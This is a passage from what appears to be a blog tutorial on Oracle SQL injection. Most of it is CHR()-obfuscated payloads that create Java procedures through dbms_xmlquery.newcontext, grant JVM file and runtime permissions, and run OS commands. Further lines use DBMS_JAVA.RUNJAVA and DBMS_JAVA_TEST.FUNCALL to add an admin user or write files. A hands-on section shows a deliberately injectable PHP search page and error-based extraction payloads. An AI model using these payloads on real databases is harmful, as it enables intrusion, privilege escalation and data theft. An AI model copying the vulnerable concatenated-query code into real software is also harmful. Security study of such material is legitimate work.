CHR(116)||CHR(43)||CHR(34)||CHR(92)||CHR(110)||CHR(34)||CHR(
59)||CHR(109)||CHR(82)||CHR(46)||CHR(99)||CHR(108)||CHR(111)||CHR(115)||CHR(101)||CHR(40)||CHR(41)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(59)||CHR(125)||CHR(125)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(112)||CHR(95)||CHR(102)||CHR(105)||CHR(108)||CHR(101)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(105)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(117)||CHR(97)||CHR(103)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(11
8)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(46)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(39)||CHR(39)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n' and dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CH
R(32)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(32)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(60)||CHR(60)||CHR(65)||CHR(76)||CHR(76)||CHR(32)||CHR(70)||CHR(73)||CHR(76)||CHR(69)||CHR(83)||CHR(62)||CHR(62)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||
CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(32)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava()--\n' and 
dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(49)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||
CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(119)||CHR(114)||CHR(105)||CHR(116)||CHR(101)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(68)||CHR(101)||CHR(115)||CHR(99)||CHR(114)||CHR(105)||CHR(112)||CHR(116)||CHR(111)||CHR(114)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(42)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(
67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava1()--\n' and dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(50)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR
(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(68)||CHR(101)||CHR(115)||CHR(99)||CHR(114)||CHR(105)||CHR(112)||CHR(116)||CHR(111)||CHR(114)||CHR(39)||CHR(39)||CHR(39)
||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(42)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava2()--\n' and 1=2 union select 1,(select javacmd('whoami') from dual),3 from dual--\n\nIf the account already holds java.io.FilePermission (or the JAVASYSPRIV role), the vulnerable packages below can also be called to run OS commands directly, without creating any object first:\nDBMS_JAVA.RUNJAVA() 11g R1 and R2\nSELECT\u0020
DBMS_JAVA.RUNJAVA('oracle\/aurora\/util\/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe \/c net user admin password \/add') FROM DUAL;\nDBMS_JAVA_TEST.FUNCALL()  10g R2, 11g R1 and R2\nSelect DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','\/bin\/bash','-c','pwd &gt; \/tmp\/pwd.txt') from dual;\nSelect DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','\/c','dir &gt; c:\\\\pwd.txt') from dual; # on the Windows target this failed with ORA-29540: class oracle\/aurora\/util\/Wrapper does not exist\n<\/code><\/pre><\/div><\/div>\n\n<h3 id=\"0x3-\u5b9e\u6218\">0x3 Hands-on<\/h3>\n<p>This section applies the summary above to a hands-on target: a deliberately vulnerable PHP search page backed by Oracle 10g.<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Database table:\ncreate table users(id int,name varchar(255),age int);\nINSERT INTO users VALUES ('1', 'test', '22');\nINSERT INTO users VALUES ('2', 'admin', '33');\nINSERT INTO users VALUES ('3', 'aaaa', '44');\ncommit;\nServer-side code (the search term is concatenated straight into the LIKE clause, which is the injection point; binding it with oci_bind_by_name would close the hole):\n&lt;?php\nfunction query($name) {\n    $db = \"(DESCRIPTION=(ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.44.157)(PORT = 1521)))(CONNECT_DATA=(SID=orcl)))\"; \n    $conn = oci_connect('TEST', 'test123456789', $db);\n    if (! $conn) {\n        $e = oci_error();\n        die('Cannot connect to the database: '. $e['message']);\n    }\n    \/\/ vulnerable: user input is interpolated into the SQL text\n    $stat = oci_parse($conn, \"SELECT id,name,age FROM TEST.users WHERE name LIKE '%\". $name .\"%'\");\n    echo \"SELECT id,name,age FROM TEST.users WHERE name LIKE '%\". $name .\"%'\";\n    \/\/ oci_execute() returns false on an ORA- error, which PHP also prints as a warning (this is what the error-based payloads rely on)\n    if (oci_execute($stat)) {\n        echo '&lt;table&gt;';\n        echo '&lt;tr&gt;&lt;th&gt;ID&lt;\/th&gt;&lt;th&gt;Name&lt;\/th&gt;&lt;th&gt;Age&lt;\/th&gt;&lt;\/tr&gt;';\n        while (($row = oci_fetch_array($stat, OCI_BOTH)) != false) {\n            echo '&lt;tr&gt;';\n            echo '&lt;td&gt;'.\u0020
$row['ID'] .'&lt;\/td&gt;';\n            echo '&lt;td&gt;'. htmlspecialchars($row['NAME']) .'&lt;\/td&gt;';\n            echo '&lt;td&gt;'. $row['AGE'] .'&lt;\/td&gt;';\n            echo '&lt;\/tr&gt;';\n        }\n        echo '&lt;\/table&gt;';\n    }\n    oci_free_statement($stat);\n    oci_close($conn);\n}\n\nif (isset($_POST['name']) &amp;&amp; !empty($_POST['name'])) {\n    query($_POST['name']);\n}\n\n?&gt;\n\n&lt;form method=\"POST\"&gt;\n&lt;input type=\"text\" name=\"name\" size=\"15\"&gt;&lt;input type=\"submit\" value=\"Search\"&gt;\n&lt;\/form&gt;\n<\/code><\/pre><\/div><\/div>\n<p>Inject through the search box: searching for a shows the SQL statement the page builds. The ctxsys.drithsx.sn calls that follow are error-based extraction, the selected value being reflected in the ORA-20000 \/ DRG-11701 error text that the page prints.\n <img src=\"\/images\/posts\/hackingoracle\/WX20180619-171718@2x.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--\n current user: TEST\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"\/images\/posts\/hackingoracle\/2.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))--\n version: Oracle Database 10g Enterprise Edition Release 